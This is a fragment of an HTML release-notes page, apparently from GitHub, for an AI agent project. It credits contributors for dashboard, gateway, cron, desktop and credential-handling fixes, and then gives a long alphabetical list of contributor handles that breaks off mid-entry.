<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xxxigm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xxxigm">@xxxigm</a> — <code>&lt;think&gt;</code> leak fix after thinking-only retry flush, dashboard auth/theme/PTY fixes</li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/erosika/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/erosika">@erosika</a> — desktop declarative memory-provider panel + honcho recall/timeout correctness</li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Frowtek/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Frowtek">@Frowtek</a> — credential security: master stores never mounted into skill sandboxes, live-transcript redaction, dashboard api_key precedence</li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/necoweb3/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/necoweb3">@necoweb3</a> — browser private-page CDP guard, cron one-shot liveness, gateway compression fail-closed</li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DavidMetcalfe/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DavidMetcalfe">@DavidMetcalfe</a> — desktop updater version pill, Local/custom endpoint exposure, sidebar collapse behavior</li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shannonsands/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shannonsands">@shannonsands</a> — dashboard: mobile channel setup, Discord toolsets from web UI, Telegram setup clarity</li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vishal-dharm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vishal-dharm">@vishal-dharm</a> — Gemini request-context improvements</li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PRATHAMESH75/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PRATHAMESH75">@PRATHAMESH75</a> — cron one-shot stale-removal race, dashboard multiplex port-binding guard</li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alelpoan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alelpoan">@alelpoan</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/embwl0x/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/embwl0x">@embwl0x</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Adolanium/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Adolanium">@Adolanium</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/giggling-ginger/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/giggling-ginger">@giggling-ginger</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Drexuxux/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Drexuxux">@Drexuxux</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/frizikk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/frizikk">@frizikk</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JoaoMarcos44/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JoaoMarcos44">@JoaoMarcos44</a>, @wesleysimplici, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LeonSGP43/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LeonSGP43">@LeonSGP43</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pierrenode/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pierrenode">@pierrenode</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/simpolism/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/simpolism">@simpolism</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MorAlekss/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MorAlekss">@MorAlekss</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/r266-tech/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/r266-tech">@r266-tech</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WadydX/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WadydX">@WadydX</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nv-kasikritc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nv-kasikritc">@nv-kasikritc</a> — targeted fixes across desktop, TUI, gateway, cron, webhook, nix, and browser surfaces</li>
<li>Salvaged-work authors whose PRs were cherry-picked with credit this window: <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Burgunthy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Burgunthy">@Burgunthy</a> (profile routing), <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/web3blind/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/web3blind">@web3blind</a> (sessions export), <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hwrdprkns/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hwrdprkns">@hwrdprkns</a> (1Password), <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Christopher-Schulze/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Christopher-Schulze">@Christopher-Schulze</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Ahmett101/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Ahmett101">@Ahmett101</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sjiangtao2024/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sjiangtao2024">@sjiangtao2024</a>, and many more — see the salvage PR bodies for full attribution</li>
</ul>
<h3>All contributors</h3>
<p><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/0-CYBERDYNE-SYSTEMS-0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/0-CYBERDYNE-SYSTEMS-0">@0-CYBERDYNE-SYSTEMS-0</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/0disoft/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/0disoft">@0disoft</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/0xbyt4/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/0xbyt4">@0xbyt4</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/17324393074/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/17324393074">@17324393074</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/2751738943/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/2751738943">@2751738943</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/8294/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/8294">@8294</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/abhibansal-sg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/abhibansal-sg">@abhibansal-sg</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/adambiggs/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/adambiggs">@adambiggs</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Adolanium/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Adolanium">@Adolanium</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aeyeopsdev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aeyeopsdev">@aeyeopsdev</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aguung/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aguung">@aguung</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AhmetArif0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AhmetArif0">@AhmetArif0</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Ahmett101/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Ahmett101">@Ahmett101</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ai-ag2026/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ai-ag2026">@ai-ag2026</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AIalliAI/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AIalliAI">@AIalliAI</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ajzrva-sys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ajzrva-sys">@ajzrva-sys</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alastraz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alastraz">@alastraz</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alelpoan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alelpoan">@alelpoan</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alex-fireworks/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alex-fireworks">@alex-fireworks</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alex-heritier/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alex-heritier">@alex-heritier</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alex107ivanov/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alex107ivanov">@alex107ivanov</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AlexFucuson9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AlexFucuson9">@AlexFucuson9</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Alix-007/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Alix-007">@Alix-007</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/allenliang2022/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/allenliang2022">@allenliang2022</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Almurat123/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Almurat123">@Almurat123</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AlsayedHoota/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AlsayedHoota">@AlsayedHoota</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alt-glitch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alt-glitch">@alt-glitch</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alvarosanchez/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alvarosanchez">@alvarosanchez</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amanning3390/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amanning3390">@amanning3390</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AmAzing129/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AmAzing129">@AmAzing129</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AndreasHiltner/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AndreasHiltner">@AndreasHiltner</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/andrewhomeyer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/andrewhomeyer">@andrewhomeyer</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/annguyenNous/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/annguyenNous">@annguyenNous</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ansel-f/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ansel-f">@ansel-f</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/antydizajn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/antydizajn">@antydizajn</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/arminanton/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/arminanton">@arminanton</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/arnispiekus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/arnispiekus">@arnispiekus</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/asimons81/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/asimons81">@asimons81</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/asscan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/asscan">@asscan</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ats3v/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ats3v">@ats3v</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/austinlaw076/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/austinlaw076">@austinlaw076</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/austinpickett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/austinpickett">@austinpickett</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/avifenesh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/avifenesh">@avifenesh</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aydnOktay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aydnOktay">@aydnOktay</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Bartok9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Bartok9">@Bartok9</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bautrey/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bautrey">@bautrey</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bbednarski9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bbednarski9">@bbednarski9</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bbopen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bbopen">@bbopen</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bigstar0920/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bigstar0920">@bigstar0920</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/binhnt92/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/binhnt92">@binhnt92</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bird/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bird">@bird</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Black0Fox0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Black0Fox0">@Black0Fox0</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BlackishGreen33/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BlackishGreen33">@BlackishGreen33</a>, @bo.fu, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brendandebeasi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brendandebeasi">@brendandebeasi</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/briandevans/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/briandevans">@briandevans</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BROCCOLO1D/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BROCCOLO1D">@BROCCOLO1D</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Bruce-anle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Bruce-anle">@Bruce-anle</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brunz-me/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brunz-me">@brunz-me</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Burgunthy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Burgunthy">@Burgunthy</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bytesnail/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bytesnail">@bytesnail</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/catbearlove1-lang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/catbearlove1-lang">@catbearlove1-lang</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Cdddo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Cdddo">@Cdddo</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cgarwood82/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cgarwood82">@cgarwood82</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/CharmingGroot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/CharmingGroot">@CharmingGroot</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chouqin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chouqin">@chouqin</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Christopher-Schulze/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Christopher-Schulze">@Christopher-Schulze</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/claudlos/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/claudlos">@claudlos</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/CocaKova/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/CocaKova">@CocaKova</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Code-suphub/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Code-suphub">@Code-suphub</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/CodeForgeNet/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/CodeForgeNet">@CodeForgeNet</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/craigdfrench/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/craigdfrench">@craigdfrench</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/CrazyBoyM/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/CrazyBoyM">@CrazyBoyM</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/crazywriter1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/crazywriter1">@crazywriter1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cresslank/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cresslank">@cresslank</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cruzanstx/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cruzanstx">@cruzanstx</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cyrkstudios/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cyrkstudios">@cyrkstudios</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/danilofalcao/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/danilofalcao">@danilofalcao</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/datachainsystems/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/datachainsystems">@datachainsystems</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DatTheMaster/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DatTheMaster">@DatTheMaster</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/davidb73-hub/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/davidb73-hub">@davidb73-hub</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/davidgut1982/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/davidgut1982">@davidgut1982</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DavidMetcalfe/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DavidMetcalfe">@DavidMetcalfe</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/davidrobertson/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/davidrobertson">@davidrobertson</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/deacon-botdoctor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/deacon-botdoctor">@deacon-botdoctor</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DECK6/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DECK6">@DECK6</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/deepujain/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/deepujain">@deepujain</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/derek2000139/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/derek2000139">@derek2000139</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/designnotdrum/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/designnotdrum">@designnotdrum</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/deusyu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/deusyu">@deusyu</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/devatnull/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/devatnull">@devatnull</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/devorun/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/devorun">@devorun</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dexhunter/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dexhunter">@dexhunter</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dfein38347g/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dfein38347g">@dfein38347g</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Dhravya/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Dhravya">@Dhravya</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DictatorBacon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DictatorBacon">@DictatorBacon</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/digitalbase/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/digitalbase">@digitalbase</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dlkakbs/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dlkakbs">@dlkakbs</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dmabry/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dmabry">@dmabry</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DNAlec/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DNAlec">@DNAlec</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dodo-reach/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dodo-reach">@dodo-reach</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/doncazper/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/doncazper">@doncazper</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dorokuma/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dorokuma">@dorokuma</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/doxe0x/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/doxe0x">@doxe0x</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Drexuxux/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Drexuxux">@Drexuxux</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dschnurbusch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dschnurbusch">@dschnurbusch</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Dusk1e/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Dusk1e">@Dusk1e</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/EdderTalmor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/EdderTalmor">@EdderTalmor</a>, <a class="user-mention notranslate" data-hovercard-type="user" 